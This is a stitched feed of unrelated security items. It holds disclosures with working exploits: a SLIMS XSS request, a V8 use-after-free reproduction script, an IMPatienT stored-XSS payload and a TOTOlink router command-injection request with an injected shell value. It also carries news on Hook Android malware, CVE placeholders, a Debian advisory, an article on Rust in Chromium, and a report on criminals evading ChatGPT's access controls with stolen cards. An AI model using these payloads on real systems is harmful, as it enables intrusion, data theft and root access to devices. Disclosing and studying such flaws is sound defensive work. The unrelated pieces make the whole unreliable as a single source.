SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called Hook that introduces new capabilities to access files stored in the devices and create a remote interactive session.
ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring

Mobile Security / Android

The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called **Hook** that introduces new capabilities to access files stored in the devices and create a remote interactive session.

ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that's advertised for sale for $7,000 per month while featuring "all the capabilities of its predecessor."

"In addition, it also adds to its arsenal Remote Access Tooling (RAT) capabilities, joining the ranks of families such as Octo and Hydra, which are capable performing a full Device Take Over (DTO), and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," the Dutch cybersecurity firm said.

A majority of the financial apps targeted by the malware are located in the U.S., Spain, Australia, Poland, Canada, Turkey, the U.K., France, Italy, and Portugal.

Hook is the handiwork of a threat actor known as DukeEugene and represents the latest evolution of ERMAC, which was first disclosed in September 2021 and is based on another trojan named Cerberus that had its source code leaked in 2020.

"Ermac has always been behind Hydra and Octo in terms of capabilities and features," ThreatFabric researcher Dario Durando told The Hacker News via email. "This is also known among threat actors, who prefer these two families above Ermac."

"The lack of some sort of RAT capabilities is a major issue for a modern Android Banker, as it does not provide the possibility to perform Device Take Over (DTO), which is the fraud methodology that is most likely to be successful and not detected by fraud scoring engines or fraud analysts. This is most likely what triggered the development of this new malware variant."

Like other Android malware of its ilk, the malware abuses Android's accessibility services APIs to conduct overlay attacks and harvest all kinds of sensitive information such as contacts, call logs, keystrokes, two-factor authentication (2FA) tokens, and even WhatsApp messages.

It also sports an expanded list of apps to include ABN AMRO and Barclays, while the malicious samples themselves masquerade as the Google Chrome web browser to dupe unsuspecting users into downloading the malware:

*   com.lojibiwawajinu.guna
*   com.damariwonomiwi.docebi
*   com.yecomevusaso.pisifo

Among the other major features to be added to Hook is the ability to remotely view and interact with the screen of the infected device, obtain files, extract seed phrases from crypto wallets, and track the phone's location, blurring the line between spyware and banking malware.

ThreatFabric said the Hook artifacts observed so far in a testing phase, but noted it could be delivered via phishing campaigns, Telegram channels, or in the form of Google Play Store dropper apps.

"The main drawback of creating a new malware is usually gaining enough trust by other actors, but with the status of DukeEugene among criminals, it is very likely that this will not be an issue for Hook," Durando said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Android Users Beware: New Hook Malware with RAT Capabilities Emerges

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

The user would have to click on a specially crafted URL to be compromised by the attacker.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221213**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221213)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21719: Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

Chrome suffers from a copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess.

Chrome: Copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess

VULNERABILITY DETAILS  
Copy-on-write is one of V8's internal optimization features that allows multiple JavaScript objects to share the same element store. This feature is primarily used to optimize creation of JavaScript arrays from literals. It's important that every function that can add a new element to a JS object or modify an existing one first checks that the element store isn't marked as COW and makes a copy of the store if needed. Otherwise, the element will be unexpectedly changed for every object that uses the same store.

Consider the implementation of the safety check in `JSNativeContextSpecialization::BuildElementAccess`:

```  
JSNativeContextSpecialization::ValueEffectControl  
JSNativeContextSpecialization::BuildElementAccess(  
    Node* receiver, Node* index, Node* value, Node* effect, Node* control,  
    Node* context, ElementAccessInfo const& access_info,  
    KeyedAccessMode const& keyed_mode) {  
[...]  
    if (keyed_mode.access_mode() == AccessMode::kStore &&  
        IsSmiOrObjectElementsKind(elements_kind) &&  
        !IsCOWHandlingStoreMode(keyed_mode.store_mode())) {  
      effect = graph()->NewNode(  
          simplified()->CheckMaps(  
              CheckMapsFlag::kNone,  
              ZoneHandleSet<Map>(factory()->fixed_array_map())),  
          elements, effect, control);  
    }  
[...]  
}  
```

The `CheckMaps` node is only inserted if the current access mode is `kStore`. However, there are other modes that can also result in storing an element, and one of them is `kDefine`. A call to the `Object.defineProperty` function won't lead to an access in this mode, but an attacker can take advantage of class field initialization to trigger it:

```  
function ReturnHolder() { return define_property_holder }  
class Trigger extends ReturnHolder { 123 = new_value; }  
```

The `Trigger` constructor will perform an element access that's equivalent to the expression `define_property_holder[123] = new_value`, but will set the access mode to `kDefine`, thus bypassing the safety check.

There are likely multiple ways to exploit the issue. The approach the attached reproduction case takes is to create two `PACKED_SMI_ELEMENTS` arrays that share the element store and then get one of the arrays to transition to the `PACKED_ELEMENTS` kind and store a `HeapObject` element. Since copying elements from the corrupted Smi array to another Smi array won't trigger any write barriers, we can hide the pointer from the garbage collector in a new array and trigger a use-after-free on a V8 heap address.

VERSION  
V8 version 10.9.0 (candidate)  
Google Chrome 107.0.5304.87 (Official Build) (64-bit)

REPRODUCTION CASE  
```  
function ForceGC() { try { new ArrayBuffer(2 ** 34); } catch {} }

old_space_array = Array(1, 2);

function CopyElement(from, to) { to[0] = from[0]; } // no write barrier for smi arrays  
for (let i = 0; i < 10000; ++i) {  
  CopyElement(old_space_array, old_space_array);  
}

ForceGC();

function MakeCOW() { return [0]; }  
original_cow_object = MakeCOW();

function MakeCopy() {  
  let copy = original_cow_object.concat(); // create a new object with COW elements  
  copy.splice(); // copy the elements  
  return copy;  
}

new_value = 1;  
new_value = {}; // mark the cell as mutable

function ReturnHolder() { return define_property_holder }  
class Trigger extends ReturnHolder { 0 = new_value; }

for (let i = 0; i < 10000; ++i) {  
  define_property_holder = MakeCopy();  
  new Trigger();  
}

new_value = {};  
define_property_holder = MakeCOW();  
new Trigger();

new_space_array = MakeCOW();  
new_space_array.splice();

CopyElement(new_space_array, old_space_array);

new_value = \"\";  
define_property_holder = MakeCOW();  
new Trigger();

new_space_array = null;  
ForceGC();

console.log(old_space_array[0][0]);

```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-06.

Found by: glazunov@google.com

Chrome JSNativeContextSpecialization::BuildElementAccess Bypass

IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.

A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):

Description:  
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify\_onto request.  
This may allow attackers to steal Protected Health Information (PHI).

Suggested Fix:  
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods.

Reference:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637  
https://nvd.nist.gov/vuln/detail/CVE-2023-23637  
https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

Payload:

    PATCH /modify_onto HTTP/1.1
    Host: 127.0.0.1:5000
    Content-Length: 2218
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Origin: http://127.0.0.1:5000/
    Referer: http://127.0.0.1:5000/ontocreate
    Connection: close
    
    [{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]

CVE-2023-23637: [Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637 · Issue #101 · lambda-science/IMPatienT

TOTOlink A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection Vulnerability in the httpd service. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取rsabits参数下的内容传递给v8，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"rsabits":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-47853: ttt/16 at main · Am1ngl/ttt

Debian Linux Security Advisory 5317-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5317-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 13, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0141 CVE-2023-0140 CVE-2023-0139 CVE-2023-0138                 CVE-2023-0137 CVE-2023-0136 CVE-2023-0135 CVE-2023-0134     CVE-2023-0133 CVE-2023-0132 CVE-2023-0131 CVE-2023-0130     CVE-2023-0129 CVE-2023-0128Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 109.0.5414.74-2~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPBrfQACgkQEMKTtsN8TjbGjQ/+KfI0HcNDER9opW3i/NGsUubDFjtGSH2Bdh0I7CG0MFYo9jWbkskq9F/KjYHgJLTqXEZ7ZUiE/xUYDg20Ad8y1eJ8vZC4dlNaPX1SakdvAPC5HEgPFNjEO60i4SU/9y7+ujHIuuZiX7N7ATXUG7VRBTOCIFRraMzQ7iIFp3XlNPlPhW5T0XHkf+8oCl3ncFE/JCsEL22juORB93/Ws0MD7sc+Zn2F9HtIEc8PFe1PWs9xYqrT3YZXhI6jq77dcJBHzKzehWSOaDwmRWZ/PXjO5z4vM8rpcDOKQaAW55SAszu2BPNRHCph0OEibcg3Tul/sOKcnjAG2UwKf1dVDEwUf6tcvk1/pIdkpVVurH0AHUU86qlLAimDNwIIyNwpxGACaa9d81GjwPp/pR0CcC38ttJaqCQMEf68F65dy/8GFBab/HrB8lDEB2tL/dWCFzWehcfntcr+mVsxktB8mY0FJWC6JIoQPJA3BALmH95duUmDYlcIYsjPipiFj74+IAUijIgVeyCCl/6jJ1TWQSlHuMnMJIVzzGEDH3DGXiLaE2ZRDHap8y/IBbDXeHRZ8YQ1CwBSaTeyHrp7zBPL2iu4LsJzT6c7zijvJClJGHkzhBbUlDyPc4G1ew20p4BnOBTOiDa4Vxyg8NnCREPjHW7oR2S7FhraDjAK/8g4t87cUy8==11U3-----END PGP SIGNATURE-----

Debian Security Advisory 5317-1

**According to the CVSS metric, a successful exploitation could lead to a scope change (S:C). What does this mean for this vulnerability?**

This vulnerability could lead to a browser sandbox escape.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221216**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221216)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21795: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Categories: News
Tags: Google

Tags:  Chromium

Tags:  Rust

Tags:  memory safety

Tags:  rule of two

Google has announced that it will support the use of third-party Rust libraries in Chromium which is a step forward in memory safety for the browsers.



(Read more...)




The post Google to support the use of Rust in Chromium appeared first on Malwarebytes Labs.

In a blog by the Chrome security team we learned that the Chromium project is going to support the use of third-party Rust libraries from C++ in Chromium.

This is good news because Rust is a so-called memory-safe programming language. So using it in a widespread program like Chrome and the other members of the Chromium family means that almost everyone can benefit from this step forward.

Besides Google’s own Chrome browser, Microsoft Edge, Opera, and many other browsers are based on Chromium code. Reportedly, there are over 25 million lines of code in 36 programming languages in the Chromium browser codebase.

**Rust**

Rust is a community project and the product is a high-level, general-purpose programming language that enforces memory safety. Rust started in 2006 as a personal project by Mozilla Research employee Graydon Hoare as part of the development of the Servo browser engine. Then, in February 2021, the Servo team was disbanded and the Rust Foundation was announced by its five founding companies (AWS, Huawei, Google, Microsoft, and Mozilla).

Rust is designed to be memory safe, because poor memory management has been the root cause for way too many vulnerabilities, for way too long. Only a few months ago, the NSA urged a shift to memory safe programming languages.

**Memory vulnerabilities**

If you ever read our posts describing security vulnerabilities, you will see a lot of phrases like "buffer overflow", "failure to release memory", "use after free", "memory corruption", and "memory leak". These are all memory management issues. And the best way to prevent memory management issues is to use a memory-safe language, which manages memory automatically instead of relying on a programmer to code things correctly.

In an earlier article about the effects of the introduction of memory safe languages in Android we showed a steady decline of memory safety vulnerabilities in Android. With the introduction of memory-safe languages like Kotlin, Java, and Rust in the development of the Android operating system, the contributions to the software that ties everything together in the background coded in C and C++ have gone down considerably.

**Rule of two**

Google’s goals for allowing the use of Rust libraries in Chromium are to provide a simpler and safer way to satisfy the rule of two, in order to speed up development and improve the security of Chrome.

The rule of two is demonstrated in the image below:

_Image courtesy of Google_

It says not to pick more than two of these possibly unsafe circumstances:

*   untrustworthy inputs
*   unsafe implementation language
*   high privilege

By eliminating the “code written in an unsafe language” factor wherever you can, you lessen the need to run code in a sandbox. So, there is less code needed and less need for security reviews. This speeds up development while improving the security. Eliminating the untrustworthy input is almost impossible when you are working on a browser.

The Chrome browser runs as an OS-level account representing a person which is considered a high privilege. In Chrome, sandboxing is applied to attain privilege reduction, which means running the code in a process that has had some or many of its privileges revoked.

**Libraries**

Rust was set out to be the foundation for a secure browser and has already proven its use in a browser for Mozilla. But for now, Google will only support third-party libraries. Third-party libraries are written as standalone components, they don’t hold implicit knowledge about the implementation of Chromium.

For future developments, Google is investing in Crubit, an experiment in how to increase the fidelity of interop between C++ and Rust and express or encapsulate the requirements of each language to the other.  Interop refers to two or more browsers behaving the same.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google to support the use of Rust in Chromium

By Waqas
One of the threat actors inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.
This is a post from HackRead.com Read the original post: Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Russian hacker forums have been flooded with queries wondering how hackers can bypass OpenAI’s restrictions to exploit ChatGPT for spreading malware and other day-to-day criminal operations.

Hackread.com earlier **reported** how hackers are abusing ChatGPT to deploy malware. As per the latest news, Russian hackers are now trying to bypass OpenAI restrictions to exploit ChatGPT for malicious purposes.

According to Check Point Research (CPR), Russian hackers are trying to bypass OpenAI‘s restrictions for the malicious use of ChatGPT. For your information, ChatGPT is an OpenAI-owned chatbot launched in November 2022.

An article published on a Russian hacker forum (Image shared with Hackread.com by Check Point)

It is designed on the GPT-3 family of large language models and has been fine-tuned with reinforcement and supervised learning techniques. Its core function is mimicking human conversations, but the chatbot is highly versatile and features voice improvisation skills. 

Such as it can debug or write computer programs for composing music, fairy tales, teleplays, and even essays. Moreover, it can answer test questions, write poetry and lyrics, and emulate a Linux system.

**Russian Hackers and ChatGPT**

Given its versatility, Russian hackers are looking to bypass OpenAI’s API restrictions to access this chatbot. Check Point researchers identified discussions on underground hacking forums where threat actors shared details on how to circumvent IPs, phone numbers, and payment card restrictions, which are essential for using this platform from Russia.

Threat Intelligence Group Manager at Check Point Software Technologies, Sergey Shykevich, said that it isn’t challenging to bypass OpenAI’s restrictions for specific countries as it is easier there to access ChatGPT.

“Right now, we are seeing Russian hackers already discussing and checking how to get past the geofencing to use ChatGPT for their malicious purposes. We believe these hackers are most likely trying to implement and test ChatGPT into their day-to-day criminal operations.”

CPR has shared screenshots of these discussions. In one of the threads, a threat actor inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.

(Image shared with Hackread.com by Check Point)

In another thread, a cybercriminal is asking about bypassing the platform’s Geo Controls. In the third screenshot.

The third screenshot shows a tutorial shared on the hacking forums in Russian semi-legal online SMS services and how to use them to register ChatGPT.

(Image shared with Hackread.com by Check Point)

“Cybercriminals are growing more and more interested in ChatGPT because the AI technology behind it can make a hacker more cost-efficient,” Shykevich added.

**What if cyber criminals use AI?**

Artificial Intelligence **(AI) has been a boon to cybersecurity companies** and countless businesses, allowing them to automate processes and optimize their performance. But what if this powerful technology was used for nefarious purposes? Recent reports suggest that advances in AI are making it easier for cybercriminals to launch attacks on networks and steal valuable data.

Cybercriminals have long relied on automation tools to hide their activities from detection, but with the help of AI, they can take these tactics one step further. For example, attackers can use deep learning algorithms and natural language processing techniques to create more convincing phishing emails that can be used as part of larger schemes.

In addition, AI-based malware is becoming increasingly sophisticated, enabling it to evade traditional security measures like **anti-virus software** and **firewalls**.

1.  AI-based Model to Predict Extreme Wildfire Danger
2.  Website uses AI to create utterly realistic human faces
3.  Microsoft patent reveals chatbot to talk to dead people
4.  This AI Can Generate Unique and Free Bored Ape NFTs
5.  AI-Powered Smart Glasses Give Deafs Power of Speech
6.  ‘Fawkes’ privacy tool blocks images from facial recognition
7.  Retired Software Exploited To Target Power Grids, Microsoft
8.  Spyware Vendor Exploited Chrome, Firefox, Windows 0-days

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#chrome